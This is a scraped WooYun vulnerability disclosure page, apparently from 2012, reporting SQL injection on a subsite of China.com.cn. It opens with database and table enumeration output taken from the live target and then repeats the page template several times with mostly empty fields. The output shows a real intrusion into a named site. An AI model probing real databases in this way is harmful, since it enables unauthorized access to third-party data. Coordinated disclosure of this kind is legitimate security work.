| time_zone_name                               |
| time_zone_transition                         |
| time_zone_transition_type                    |
| user                                         |
+----------------------------------------------+
Database: test
[1 table]
+----------------------------------------------+
| zgzy_ratings                                 |
+----------------------------------------------+
Database: information_schema
[37 tables]
+----------------------------------------------+
| CHARACTER_SETS                               |
| COLLATIONS                                   |
| COLLATION_CHARACTER_SET_APPLICABILITY        |
| COLUMNS                                      |
| COLUMN_PRIVILEGES                            |
| ENGINES                                      |
| EVENTS                                       |
| FILES                                        |
| GLOBAL_STATUS                                |
| GLOBAL_VARIABLES                             |
| INNODB_CMP                                   |
| INNODB_CMPMEM                                |
| INNODB_CMPMEM_RESET                          |
| INNODB_CMP_RESET                             |
| INNODB_LOCKS                                 |
| INNODB_LOCK_WAITS                            |
| INNODB_TRX                                   |
| KEY_COLUMN_USAGE                             |
| PARAMETERS                                   |
| PARTITIONS                                   |
| PLUGINS                                      |
| PROCESSLIST                                  |
| PROFILING                                    |
| REFERENTIAL_CONSTRAINTS                      |
| ROUTINES                                     |
| SCHEMATA                                     |
| SCHEMA_PRIVILEGES                            |
| SESSION_STATUS                               |
| SESSION_VARIABLES                            |
| STATISTICS                                   |
| TABLES                                       |
| TABLESPACES                                  |
| TABLE_CONSTRAINTS                            |
| TABLE_PRIVILEGES                             |
| TRIGGERS                                     |
| USER_PRIVILEGES                              |
| VIEWS                                        |
+----------------------------------------------+
修复方案：

升级程序
版权声明：转载请注明来源 zhk@乌云

漏洞回应

厂商回应：

危害等级：中
漏洞Rank：9
确认时间：2012-07-11 13:53
厂商回复：

CNVD确认并复现所述情况，由CNVD直接联系涉事单位处置（此前联系过一起疑似漏洞事件，后该单位确认为正常功能）。
按安全影响机密性进行评分，rank=7.79*1.0*1.1=8.596
WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2012-09298

漏洞标题：中国网分站SQL注入

相关厂商：中国网

漏洞作者： zhk

提交时间：2012-07-06 18:44

修复时间：2012-08-20 18:45

公开时间：2012-08-20 18:45

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 zhk@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2012-09298

漏洞标题：中国网分站SQL注入

相关厂商：中国网

漏洞作者： zhk

提交时间：2012-07-06 18:44

修复时间：2012-08-20 18:45

公开时间：2012-08-20 18:45

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2012-09298"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 zhk@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：
